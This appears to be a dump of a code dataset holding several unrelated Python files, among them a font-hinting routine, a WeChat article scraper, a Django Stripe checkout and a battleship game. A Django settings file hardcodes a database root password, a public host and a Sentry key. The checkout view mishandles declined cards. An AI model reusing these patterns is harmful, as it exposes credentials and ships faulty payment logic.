h.state.stack[-3]\n Ranges: [(10, 40, 10)]\n >>> pp.PP().sequence_deep_tag(h.state.pushHistory)\n 0:\n Extra index 0 in PUSH opcode index 0 in test\n Extra index 1 in PUSH opcode index 0 in test\n 1:\n Extra index 2 in PUSH opcode index 0 in test\n 2:\n Extra index 0 in PUSH opcode index 0 in test\n Extra index 1 in PUSH opcode index 0 in test\n >>> h.state.stack[:] = []\n >>> h.state.changed('stack')\n >>> hint_MINDEX(h, logger=logger)\n MINDEX_test - CRITICAL - Stack underflow in test (PC 1).\n \"\"\"\n \n state = self.state\n stack = state.stack\n logger = self._getLogger(**kwArgs)\n t = self._popRemove(state, 'stack', coerceToCollection=True)\n \n if t is None:\n state.assign('pc', doNotProceedPC)\n return\n \n allIndices = set(t)\n \n if self._popRemove(state, 'pushHistory') is None:\n state.assign('pc', doNotProceedPC)\n return\n \n largestSpan = max(allIndices)\n \n if largestSpan > len(stack):\n logger.error((\n 'E6030',\n (self.ultParent.infoString, state.pc + self.ultDelta),\n \"MINDEX opcode in %s (PC %d) attempted to reach past the start \"\n \"of the stack.\"))\n \n state._validationFailed = True\n state.assign('pc', doNotProceedPC)\n return\n \n workRange = list(range(-largestSpan, 0))\n indexLists = [mindexSub(workRange, n) for n in allIndices]\n newStackPiece, newHistoryPiece = [], []\n \n for n in workRange:\n contributors = set(v[n] for v in indexLists)\n \n if len(contributors) == 1:\n resolvedIndex = contributors.pop()\n newStackPiece.append(stack[resolvedIndex])\n newHistoryPiece.append(state.pushHistory[resolvedIndex])\n \n else:\n newCollection = Collection()\n newHistoryPieces = []\n \n for resolvedIndex in contributors:\n newCollection = newCollection.addToCollection(\n stack[resolvedIndex])\n \n newHistoryPieces.append(state.pushHistory[resolvedIndex])\n \n nc2 = newCollection.toNumber()\n \n if nc2 is not None:\n newCollection = nc2\n \n newStackPiece.append(newCollection)\n newHistoryPiece.append(historygroup.HistoryGroup(newHistoryPieces))\n \n stack[-largestSpan:] = newStackPiece\n state.changed('stack')\n state.pushHistory[-largestSpan:] = newHistoryPiece\n state.changed('pushHistory')\n state.assign('pc', state.pc + 1)\n \n fatObj = kwArgs.get('fdefArgTracer', None)\n \n if fatObj is not None:\n fatObj.notePop('stackIndex', 'MINDEX')\n \n if len(allIndices) > 1:\n raise ValueError(\n \"FDEF argument tracking cannot deal with Collections \"\n \"as stack indices.\")\n \n fatObj.hint_mindex(largestSpan)\n\ndef mindexSub(v, i):\n \"\"\"\n Given a stack-like list and a stack index (positive), returns a new list\n with the specified element moved to the top of the stack.\n \n >>> mindexSub(['a', 'b', 'c', 'd', 'e'], 2)\n ['a', 'b', 'c', 'e', 'd']\n >>> mindexSub(['a', 'b', 'c', 'd', 'e'], 4)\n ['a', 'c', 'd', 'e', 'b']\n \"\"\"\n \n retVal = list(v)\n newTop = retVal[-i]\n del retVal[-i]\n retVal.append(newTop)\n return retVal\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n def __________________(): pass\n\nif __debug__:\n from fontio3 import utilities\n from fontio3.triple.collection import toCollection\n from fontio3.utilities import pp\n \n def _testFuncs():\n from fontio3.hints import hints_tt\n return hints_tt._popSync, hints_tt._testingState\n\ndef _test():\n import doctest\n doctest.testmod()\n\nif __name__ == \"__main__\":\n if __debug__:\n _test()\n","sub_path":"fontio3/fontio3/hints/details/hint_mindex.py","file_name":"hint_mindex.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274338141","text":"# Importing libraries\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\n\n\n# Reading data\ncustomer = pd.read_csv('CC.csv')\nx = customer.iloc[:, 1:17]\ny = customer.iloc[:, -1]\nx = x.fillna(0)\n\n# Standardization of the data\nscaler = StandardScaler()\nscaler.fit(x)\n\n# Projecting data on reduced dimension\nx_scaler = scaler.transform(x)\n\n# Performing Principle Component Analysis (PCA)\npca = PCA(2)\nx_pca = pca.fit_transform(x_scaler)\ndf2 = pd.DataFrame(data=x_pca)\nfinaldf = pd.concat([df2, customer[\"TENURE\"]], axis=1)\nprint(finaldf)\n\n# Bonus: KMeans on PCA\n# Performing K-Means clustering on the PCA data\nnclusters = 3\nkm = KMeans(n_clusters=nclusters)\nkm.fit(x_pca)\n\n# Evaluation of the clusters accuracy\ny_cluster_KMeans = km.predict(x_pca)\nscore = metrics.silhouette_score(x_pca, y_cluster_KMeans, metric='euclidean', sample_size=42)\nprint('Silhoutee Score of the Clusters using PCA is ', score)\n\n# Elbow point computation to determine optimum number of clusters\nwcss = []\nfor i in range(1, 11):\n kmeans = KMeans(n_clusters=i, max_iter=300, random_state=0)\n kmeans.fit(x_pca)\n wcss.append(kmeans.inertia_)\n\n#Plotting the elbow point on graph\nplt.plot(range(1, 11), wcss)\nplt.title('Elbow Method')\nplt.xlabel('Number of Clusters')\nplt.ylabel('Wcss')\nplt.show()","sub_path":"ICP6_PK/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161941785","text":"import sys\nfrom random import randint\n\ndef run_guess(guessed_number, rand_number):\n if (guessed_number == rand_number):\n print(f'You found the right number {rand_number}')\n return True\n elif guessed_number > rand_number:\n print('You guessed to high')\n return False\n else:\n print('You guessed to low')\n return False\n\nif __name__ == '__main__': \n try:\n num_start = int(sys.argv[1])\n num_end = int(sys.argv[2])\n except ValueError:\n print('Please enter a valid number')\n else:\n if num_start <= 0:\n print('Start number should be greater than 0 ')\n elif num_end > 100:\n print('End number should be less or equal to 100')\n elif num_start >= num_end:\n print('Start number should be less than end number')\n else:\n rand_number = randint(num_start, num_end)\n print(f'Please guess a number between {num_start} and {num_end}')\n \n while (True):\n try:\n guessed_number = int(input('Your guess = '))\n except ValueError:\n print('Please enter a valid number')\n continue\n else:\n if (run_guess(guessed_number, rand_number)):\n break\n","sub_path":"6_Testing/Test_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41078893","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author:_defined\n@Time: 2018/09/08 17:02\n@Description: 按关键字搜索文章\n\"\"\"\nimport time\nfrom datetime import datetime\nfrom celery import group\nfrom .workers import app\nfrom ..db import (WeiChatArticle, CommonOperate, KeywordsOperate)\nfrom ..config import (max_search_page, adaptive_page, bloomfilter_article)\nfrom ..cookies import get_cookies\nfrom ..const import SearchType\nfrom ..exceptions import SpiderBanError\nfrom ..downloader import get_page\nfrom ..logger import download_logger\nfrom ..parser import (get_data, get_total_page,\n get_article_content, get_fulltext_url)\nfrom ..bloomfilter import BloomFilterRedis\n\n__all__ = ['crawl_page', 'crawl_content_by_page', 'search_article_by_keyword', 'execute_search_article_task']\n\nBase_Url = \"http://weixin.sogou.com/weixin?type={}&s_from=input&query={}&ie=utf8&page={}\"\n\n\n@app.tasks\ndef crawl_content(article_list, cookies, refer):\n \"\"\"\n 根据文章列表,抓取具体每个文章的详细内容\n :param article_list:\n :param cookies:\n :param refer:\n :return:\n \"\"\"\n print(\"==================>crawl_content()\")\n bloomfilter = BloomFilterRedis(key=bloomfilter_article)\n if not article_list:\n return ''\n print('=====>article_list', article_list)\n article_datas = list()\n print(len(article_list), '=============>文章页抓取到这么多')\n for item in article_list:\n wx_article = WeiChatArticle()\n if bloomfilter.is_exists(item['article_from'] + item['article_time']): # 以公众号名和文章发布时间来衡量是否重复抓取\n print('存在!!!!')\n continue\n html = get_page(item['article_url'], cookies, refer) # item[0] is article_url\n if not html:\n print(\"crawl content failed, the url is {}\".format(item['article_url']))\n download_logger.warning(\"crawl content failed, the url is {}\".format(item['article_url']))\n continue\n # TODO 当出现转发,需要点阅读全文的时候,得重新获取链接加载\n if '阅读全文' in html and 'js_share_source' in html:\n fulltext_url = get_fulltext_url(html)\n html = get_page(fulltext_url, cookies, refer)\n if not html:\n print(\"crawl content failed, the url is {}\".format(fulltext_url))\n download_logger.warning(\"crawl content failed, the url is {}\".format(fulltext_url))\n wx_article.date = item['article_time']\n wx_article.title = item['article_title']\n wx_article.abstract = item['article_abstract']\n wx_article.account = item['article_from']\n wx_article.url = item['article_url']\n CommonOperate.add_one(wx_article)\n continue\n content_dict = get_article_content(html)\n # [article_url, article_title, article_abstract, article_from, article_time]\n wx_article.date = item['article_time']\n wx_article.title = item['article_title']\n wx_article.abstract = item['article_abstract']\n wx_article.account = item['article_from']\n wx_article.url = item['article_url']\n wx_article.content = content_dict['content']\n wx_article.image_urls = content_dict['image_list']\n wx_article.source = content_dict['page_source']\n wx_article.video = content_dict['video']\n article_datas.append(wx_article)\n print('================>', item['article_from'])\n CommonOperate.add_all(article_datas)\n\n\n@app.task\ndef crawl_page(keyword):\n \"\"\"\n 根据关键字抓取搜索结果页\n :param keyword:\n :return:\n \"\"\"\n cur_page = 1\n wait2crawl_page = max_search_page\n cookies = get_cookies()\n # 一定要加refer\n while cur_page <= wait2crawl_page:\n print(\"====>抓取第{}页\".format(cur_page))\n url = Base_Url.format(SearchType.article, keyword, cur_page)\n refer = Base_Url.format(SearchType.article, keyword, cur_page if cur_page == 1 else cur_page - 1)\n try:\n html = get_page(url, cookies, {'Refer': refer})\n except SpiderBanError as e:\n download_logger.error(e)\n continue\n if html:\n article_list = get_data(html)\n if cur_page == 1:\n if adaptive_page:\n wait2crawl_page = get_total_page(html)\n crawl_content(article_list, cookies, {'Refer': refer})\n cur_page += 1\n time.sleep(10)\n pass\n\n\n@app.task\ndef crawl_content_by_page(page_num):\n pass\n\n\n@app.task\ndef search_article_by_keyword(keyword_object):\n expire = datetime.strptime(keyword_object[4], \"%Y-%m-%d %H:%M:%S\")\n time_now = datetime.now()\n if time_now <= expire:\n crawl_page(keyword_object[1])\n else:\n return '' # if expire, do nothing, just return\n\n\n@app.task\ndef execute_search_article_task():\n keyword_objects = KeywordsOperate.get_search_keywords()\n caller = group(search_article_by_keyword.s(kw_obj) for kw_obj in keyword_objects)\n caller.delay()\n","sub_path":"WeChatSpider/tasks/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"626682181","text":"\"\"\"This file contains all code used for creating a distance metric between two\nimages - generally a candidate image and a target image\"\"\"\n\n\nimport sys\n\nimport numpy as np\n\n\ndef get_hausdorff_dist(px, distances_black, distances_white):\n\t\"\"\"Finds the hausdorff distance between the candidate pixels\n\tand the target pixels. This is the maximum shortest distance\n\tbetween a pixel in px and a pixel in targ_px. In this case,\n\ttha average of a certain percentage of pixels values is taken.\n\tSuch as the 10 worst pixels in the shape.\n\t\"\"\"\n\t\n\t# NOTE: considered a black pixel if value above .3!\t\n\n\t# get distance value for all black pixels in the output\n\tall_dist = []\n\tfor index in range(len(px)):\n\t\t# apply the exponential function to each distance to penalize pixels exponentially\n\t\tif(px[index] >= .3):\n\t\t\tall_dist.append(distances_black[index])\t\n\t\telse:\n\t\t\tall_dist.append(distances_white[index])\n\t\n\t# return average of values in the array\n\tavg_dist = np.sum(np.array(all_dist))\n\t\n\treturn avg_dist, \n\n\n\ndef get_dist_mat(targ_pix, px_val):\n\t\"\"\"Creates a matrix that finds, for every pixel in the target\n\tpixel matrix, the euclidian distance to the nearest black pixel\n\tin the target pixel matrix\n\t\"\"\"\n\t\n\t# find location of all black pixels\n\tpx_locs = get_pixel_locs(targ_pix, px_val)\n\t\n\t# instantiate result matrix with all 0s\n\tresult_mat = np.zeros(targ_pix.shape)\n\t\n\t# find length between each possible location and closest black pixel\n\tfor r in range(len(targ_pix)):\n\t\tfor c in range(len(targ_pix[0])):\n\t\t\t# if px is black then closest distance to black px is 0\n\t\t\t# otherwise find closest distance\n\t\t\tif(targ_pix[r][c] != px_val):\n\t\t\t\tclosest = get_closest_point((r, c), px_locs)\n\t\t\t\tresult_mat[r][c] = closest\n\n\treturn result_mat.flatten()\n\n\ndef get_pixel_locs(targ_pix, px_val):\n\t\"\"\"Method that finds the x,y locations of all black pixels\n\tin a target image matrix\"\"\"\n\t\n\tpx_locs = []\n\tfor r in range(len(targ_pix)):\n\t\tfor c in range(len(targ_pix[0])):\n\t\t\tif(targ_pix[r][c] == px_val):\n\t\t\t\tpx_locs.append((r, c))\n\n\treturn px_locs\n\n\ndef get_euclidian_dist(pos, other_pos):\n\t\"\"\"Finds the euclidian distance between two (x, y) distance\n\ttuples\"\"\"\n\n\treturn np.sqrt(np.square(pos[0] - other_pos[0]) + np.square(pos[1] - other_pos[1]))\n\n\ndef get_closest_point(pos_tup, all_pos):\n\t\"\"\"Finds all euclidian distances between the current row\n\tand column position (in pos_tup) and every (row, column)\n\tposition tuple in all_pos and returns the closest one\n\t\"\"\"\n\t\n\t# initialize closest to be a very large number\n\tclosest = sys.maxsize\n\t\n\t# go through all other pixels and find the closest one\n\tfor other in all_pos:\n\t\tcurr_dist = get_euclidian_dist(pos_tup, other)\n\t\tif(curr_dist < closest):\n\t\t\tclosest = curr_dist\n\t\n\treturn closest\n\n\nif __name__ == '__main__':\n\t\"\"\"Used to run simple tests on methods\"\"\"\n\tx = np.array([[1,0,0,0],[0,0,0,0],[0,0,0,0]])\n\ty = get_dist_mat(x)\n\tz = np.array([1,0,0,1,1,1,1,0,0,1,1,1])\t\n\tprint(get_hausdorff_dist(z, y))\n","sub_path":"FULL_CPPN_disthelp.py","file_name":"FULL_CPPN_disthelp.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278273680","text":"import unittest\nimport sys, os\nimport random\nimport shutil\nimport itertools\n\nimport torch\n\nfrom bauta.DatasetGenerator import DatasetGenerator\nfrom bauta.utils.SystemUtils import SystemUtils\nfrom bauta.Trainer import Trainer\n\nclass TestTrainer(unittest.TestCase):\n\n def files(datasets_with_attributes):\n dataset = [element['dataset'] for element in datasets_with_attributes]\n if len(dataset) > 0 and len(dataset[0]) > 0:\n return {element[1] for element in dataset[0][0]}\n else:\n return {}\n\n def createDataset():\n system_utils = SystemUtils()\n images_path = f'/tmp/{random.randint(0, 100000)}'\n data_path = f'/tmp/{random.randint(0, 100000)}'\n system_utils.makeDirIfNotExists(images_path)\n squares_image_path = f'{images_path}/square.txt'\n with open(f'{images_path}/square.txt','w') as file:\n file.write('./test/data/images/square/square_1.png\\n./test/data/images/square/square_2.png')\n circles_image_path = f'{images_path}/circle.txt'\n with open(f'{images_path}/circle.txt','w') as file:\n file.write('./test/data/images/circle/circle_1.png\\n./test/data/images/circle/circle_2.png')\n backgrounds_image_path = f'{images_path}/background.txt'\n with open(f'{images_path}/background.txt','w') as file:\n file.write('./test/data/images/background/background_1.png\\n./test/data/images/background/background_2.png')\n dataset_generator = DatasetGenerator(data_path)\n datasets_with_attributes = dataset_generator.generateDatasetFromListOfImages(images_path, 0.5, 5)\n with open(f'{data_path}/config.yaml','a') as file:\n file.write(\"\\ndata_sampling:\\n\")\n file.write(\" probability_using_cache: 0.0\\n\")\n return images_path, data_path\n\n def removeDataset(images_path, data_path):\n shutil.rmtree(images_path)\n shutil.rmtree(data_path)\n\n\n def test_focalLoss(self):\n all_objects_in_image = torch.ones(1, 3)\n targets = torch.zeros(1, 3, 8, 8)\n targets[0, 0, 0:8, 0:7] = 1\n targets[0, 1, 0:8, 7:8] = 1\n targets[0, 2, :, :] = 0\n outputs = torch.zeros(1, 3, 8, 8)\n outputs[0, 0, 0:8, 0:3] = 1 # ~50% wrong\n outputs[0, 1, 0:8, 0:7] = 1 # ~700% wrong\n outputs[0, 2, 0:8, 0:8] = 0 # 100% correct\n loss = Trainer.focalLoss(outputs, targets, all_objects_in_image)\n self.assertTrue(loss[0] / 50 < 1.1)\n self.assertTrue(loss[1] / 700 < 1.1)\n self.assertTrue(loss[2] < 1e-3)\n\n def test_train_within_epoch_improves_loss(self):\n images_path, data_path = TestTrainer.createDataset()\n trainer = Trainer(data_path, visual_logging=False, reset_model=True, num_epochs=4, batch_size=1, learning_rate=0.01, momentum=0.1, gpu=0, \\\n loss_scaled_weight=0.5, loss_unscaled_weight=0.5, only_masks=True)\n trainer.train()\n TestTrainer.removeDataset(images_path, data_path)\n best_test_loss = min(trainer.test_loss_history)\n self.assertTrue((trainer.test_loss_history[0] - best_test_loss) / trainer.test_loss_history[0] > 0.01)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/TestTrainer.py","file_name":"TestTrainer.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490053186","text":"from django.shortcuts import render, get_object_or_404, HttpResponse,redirect\nfrom products.models import Product\nfrom .forms import MakePaymentForm, OrderForm\nfrom .models import OrderLineItem\nfrom django.conf import settings\nimport stripe\nfrom django.contrib import messages\n\nstripe.api_key=settings.STRIPE_SECRET_KEY\n\n\n# Create your views here.\n\ndef get_cart_items_and_total(cart):\n cart_items = []\n cart_total = 0\n for product_id, quantity in cart.items():\n product = get_object_or_404(Product, pk=product_id)\n \n cart_items.append({\n 'id': product.id,\n 'name': product.name,\n 'brand': product.brand,\n 'image': product.image,\n 'price': product.price,\n 'quantity': quantity,\n 'total': product.price * quantity\n })\n cart_total += product.price * quantity\n \n return {'cart_items': cart_items, 'cart_total':cart_total}\n\ndef show_checkout(request):\n \n cart = request.session.get('cart', {})\n cart_items_and_total = get_cart_items_and_total(cart)\n \n \n payment_form = MakePaymentForm()\n order_form = OrderForm()\n \n context = {\n \"payment_form\": payment_form, \n \"order_form\" : order_form,\n \"publishable\": settings.STRIPE_PUBLISHABLE_KEY\n }\n \n context.update(cart_items_and_total)\n \n return render(request, \"checkout/checkout.html\", context)\n\ndef submit_payment(request):\n \n cart = request.session.get('cart', {})\n cart_items_and_total = get_cart_items_and_total(cart)\n \n \n payment_form=MakePaymentForm(request.POST)\n \n order_form=OrderForm(request.POST)\n \n if order_form.is_valid() and payment_form.is_valid():\n \n \n # Grab the money and run\n total = cart_items_and_total['cart_total']\n stripe_token=payment_form.cleaned_data['stripe_id']\n\n try:\n\n total_in_cent = int(total*100)\n customer = stripe.Charge.create(\n amount=total_in_cent,\n currency=\"EUR\",\n description=\"Dummy Transaction\",\n card=stripe_token,\n )\n\n except stripe.error.CardError:\n print(\"Declined\")\n messages.error(request, \"Your card was declined!\")\n\n if customer.paid:\n print(\"Paid\")\n messages.error(request, \"You have successfully paid\")\n\n\n\n\n\n order=order_form.save()\n \n cart=request.session.get('cart',{})\n \n for product_id, quantity in cart.items():\n Line_item=OrderLineItem()\n Line_item.product_id=product_id\n Line_item.quantity=quantity\n Line_item.order=order\n Line_item.save()\n del request.session['cart']\n \n return redirect(\"/\") \n \n \n \n \n \n \n return HttpResponse(str(order.id))\n\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340463453","text":"\"\"\"\n@Author : liuwei\n@Version : \n------------------------------------\n@File : local_settings.py\n@Description : \n@CreateTime : 2020/3/12 16:30\n\"\"\"\n#############################\n# system settings\n#############################\nfrom kombu import Exchange, Queue\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'search',\n 'USER': 'root',\n 'PASSWORD': '123456',\n 'HOST': '62.234.146.101',\n 'PORT': '13306',\n }\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_CACHE_ALIAS = \"default\"\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379/1\",\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n }\n }\n}\nCACHE_REDIS_EXPIRE = 60*60\n\n#############################\n# third party app settings\n#############################\n# sentry\nSENTRY_DSN = \"http://cb1b4f982c7142dab41c1324ab3d7459@localhost:9000/3\"\n\n\n#############################\n# my app settings\n#############################\nITM_DOAMIN = \"http://128.194.224.146:8000\"\nBUILDER = {\n \"ES_HOSTS\": [\"http://62.234.146.101:9200\"]\n}\n\n#############################\n# celery setting.\n#############################\nfrom datetime import timedelta\nfrom celery.schedules import crontab\nCELERY_TIMEZONE = 'Asia/Shanghai'\nCELERY_ENABLE_UTC = True\n\nCELERY_ACCEPT_CONTENT = ['json']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_ACKS_LATE = True\nCELERYD_FORCE_EXECV = True\nCELERYD_MAX_TASKS_PER_CHILD = 100\nCELERYD_TASK_TIME_LIMIT = 12*30\n\nCELERY_BROKER_URL = 'redis://127.0.0.1:6379/2'\nCELERY_RESULT_BACKEND = 'redis://127.0.0.1:6379/2'\n# CELERY_CACHE_BACKEND = 'django-cache'\n\nCELERY_BEAT_SCHEDULER = 'django_celery_beat.schedulers.DatabaseScheduler'\nCELERY_BEAT_SCHEDULE = {\n 'interval': {\n 'task': 'builder.tasks.add',\n # 'schedule': crontab(minute=0, hour=0),\n 'schedule': timedelta(seconds=2),\n 'args': (1, 2)\n }\n}\n","sub_path":"djsearch/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367968760","text":"import numpy as np\nimport random\nfrom Barco import *\nfrom Tablero import *\nimport Constantes as cs\n\nclass Jugador:\n\n def __init__(self):\n\n self.tablero_barcos = Tablero(10)\n self.tablero_barcos.coloca_barcos_random()\n self.tablero_disparos = Tablero(10)\n self.vidas = 20\n self.disparos = []\n\n\n # def barcos(self):\n #\n # array_barcos_1_pos = np.array([Barco((1, 'C'), 1), Barco((3, 'H'), 1), Barco((6, 'I'), 1), Barco((8, 'C'), 1)])\n #\n # array_barcos_2_pos = np.array([Barco((1, 'F'), 2, 0), Barco((1, 'I'), 2, 1), Barco((10, 'G'), 2, 1)])\n #\n # array_barcos_3_pos = np.array([Barco((3, 'A'), 3, 0), Barco((5, 'E'), 3, 1)])\n #\n # array_barcos_4_pos = np.array([Barco((8, 'F'), 4, 1)])\n #\n # return np.concatenate((array_barcos_1_pos, array_barcos_2_pos, array_barcos_3_pos, array_barcos_4_pos))\n\n def imprimir_tablero(self):\n titulo = np.array(cs.LISTA_CARACTERES)\n print(\" \",titulo, \" \",titulo)\n print(\"\")\n for i in range(len(cs.LISTA_NUMEROS)):\n if i != 9:\n numero = str(cs.LISTA_NUMEROS[i]) + \" \"\n else:\n numero = str(cs.LISTA_NUMEROS[i])\n\n print(numero, self.tablero_barcos.matriz[i],\n \" \", numero, self.tablero_disparos.matriz[i])\n\n print(\"\\n\")\n\n '''def posicion_random(self):\n\n x = random.randint(0, 9)\n\n y = random.randint(0, 9)\n\n return (x, y)\n\n def barcos_random(self):\n\n for propiedades in cs.TIPOS_BARCO:\n\n contador = 0\n\n while contador < propiedades[1]:\n\n posicion = self.posicion_random()\n\n x = posicion[0]\n\n y = posicion[1]\n\n slicing_sur = self.tablero_barcos.matriz[x: x + propiedades[0], y]\n\n slicing_norte = self.tablero_barcos.matriz[x: x - propiedades[0]:-1, y]\n\n slicing_este = self.tablero_barcos.matriz[x, y: y + propiedades[0]]\n\n slicing_oeste = self.tablero_barcos.matriz[x, y:y - propiedades[0]:-1]\n\n if cs.BARCO_CHAR not in slicing_sur and len(slicing_sur) == propiedades[0]:\n\n self.tablero_barcos.matriz[x: x + propiedades[0], y] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_norte and len(slicing_norte) == propiedades[0]:\n\n self.tablero_barcos.matriz[x: x - propiedades[0]:-1, y] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_este and len(slicing_este) == propiedades[0]:\n\n self.tablero_barcos.matriz[x, y: y + propiedades[0]] = cs.BARCO_CHAR\n contador += 1\n\n elif cs.BARCO_CHAR not in slicing_oeste and len(slicing_oeste) == propiedades[0]:\n\n self.tablero_barcos.matriz[x, y:y - propiedades[0]:-1] = cs.BARCO_CHAR\n contador += 1'''\n\n def disparar(self, posicion, a_jugador):\n\n self.disparos.append(posicion)\n\n posicion_traducida = self.traducir_posicion(posicion)\n\n\n if a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] == cs.BARCO_CHAR:\n\n self.tablero_disparos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.TOCADO_CHAR\n\n a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.TOCADO_CHAR\n\n a_jugador.vidas -= 1\n\n return True\n\n else:\n\n self.tablero_disparos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.FALLO_CHAR\n\n a_jugador.tablero_barcos.matriz[posicion_traducida[0], posicion_traducida[1]] = cs.FALLO_CHAR\n\n return False\n\n def traducir_posicion(self, posicion):\n\n x = posicion[0] - 1\n\n y = cs.LISTA_CARACTERES.index(posicion[1])\n\n return (x, y)\n","sub_path":"Jugador.py","file_name":"Jugador.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284354862","text":"#!/usr/bin/env pypy\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport math\nimport sys\n\ndef name_score(name):\n res = 0\n for ltr in name:\n if ltr.isalpha():\n v = ord(ltr.lower()) - ord('a') + 1\n res += v\n return res\n\ndef main():\n names = sys.stdin.readline().strip().split(',')\n names = sorted(names)\n res = 0\n for idx, name in enumerate(names):\n res += (idx + 1) * name_score(name)\n print(res)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pe_22.py","file_name":"pe_22.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"255687479","text":"# -*- coding:utf8 -*-\nimport pandas as pd\nimport pymysql\n\nfrom .utils import make_tezheng_code, make_format\n\n\n# 根据解析出的结果构造特征字符串和物料编码\nclass MakeMetaCode(object):\n def __init__(self, db, conn, name, spec, unit, guid):\n self.db, self.conn, self.name, self.spec, self.unit, self.guid = db, conn, name, spec, unit, guid\n\n def pre_options(self):\n curs = self.db.cursor(cursor=pymysql.cursors.DictCursor)\n res = make_format(self.name, self.spec, self.unit, curs)\n curs.close()\n if not res:\n return None, None\n return self.make_specs_and_wuliao_code(res['在库名称'], res['在库特征'], res['单位'])\n\n def mysql_execute(self, sql, cursor=pymysql.cursors.DictCursor):\n cur = self.db.cursor(cursor=cursor)\n try:\n cur.execute(sql)\n self.db.commit()\n result = cur.fetchone()\n except Exception as e:\n print(e)\n return None\n cur.close()\n return result\n\n def make_code_and_df(self, specs_arr, meta):\n if specs_arr:\n df = self.make_spec_df(meta['Guid'], specs_arr)\n df = self.add_specs_not_exist(df.copy(), specs_arr, meta['Guid'])\n if df.index.size == 0:\n return df, meta['MuLu_Code']\n df_check = df['TeZheng_Attr_Name'].drop_duplicates().to_list()\n if len(df_check) < df.index.size:\n return df, meta['MuLu_Code']\n _specs = df['TeZheng_Value'].sort_values().to_list()\n df.drop(['TeZheng_Attr_Name', 'TeZheng_Name', 'TeZheng_Value'], inplace=True, axis=1)\n code = meta['MuLu_Code'] + ''.join(_specs)\n df['WuLiao_Guid'] = meta['Guid']\n else:\n df = pd.DataFrame({'WuLiao_Guid': meta['Guid']}, index=[0])\n code = meta['MuLu_Code']\n return df, code\n\n # 根据特征名称生成特征字符串和物料编码\n def make_specs_and_wuliao_code(self, wuliao, specs_arr, unit):\n sql = \"select Guid,MuLu_Code from mulu_code where Name='%s' limit 1\" % wuliao\n meta = self.mysql_execute(sql)\n if not meta:\n return None, None\n if unit:\n specs_arr.append(('单位', unit))\n return specs_arr, meta\n\n def add_in_tables(self, specs_arr, meta):\n df, code = self.make_code_and_df(specs_arr, meta)\n df['code'] = code\n df['BaoJian_CaiLiaoSheBei_Guid'] = self.guid\n return self.add_in_map(df)\n\n def make_guid_by_index(self, df, table, num_size, guid='Guid', drop_index=True):\n max_guid = self.mysql_execute(\"SELECT MAX(%s) max_id FROM %s\" % (guid, table))\n start_guid = 1\n if max_guid['max_id']:\n start_guid = int(max_guid['max_id']) + 1\n my_format = '%%%s' % ('.%sd' % num_size)\n df = df.reset_index(drop=True)\n df['index'] = df.index\n df['Guid'] = df['index'].apply(lambda x: my_format % (x + start_guid))\n if drop_index:\n del df['index']\n return df\n\n # 向map表添加\n def add_in_map(self, df):\n df = self.make_guid_by_index(df.copy(), 'trade_data', 9)\n try:\n df.to_sql('trade_data', con=self.conn, index=False, chunksize=1000, if_exists='append')\n return True\n except:\n return False\n\n # 向特征项表添加\n def add_in_df_atrr(self, dic):\n df = pd.DataFrame(dic, index=[0])\n sql = \"select Guid from tezheng_attribute where WuLiao_Guid='%s' and Tezheng_Name='%s'\" % \\\n (dic['WuLiao_Guid'], dic['Tezheng_Name'])\n statu = self.mysql_execute(sql)\n if statu:\n return statu['Guid']\n df = self.make_guid_by_index(df.copy(), 'tezheng_attribute', 8)\n try:\n df.to_sql('tezheng_attribute', con=self.conn, index=False, chunksize=1000, if_exists='append')\n # 事实上只有1行\n return df['Guid'][0]\n except:\n return False\n\n def add_in_tezheng_value(self, arr, meta):\n df = 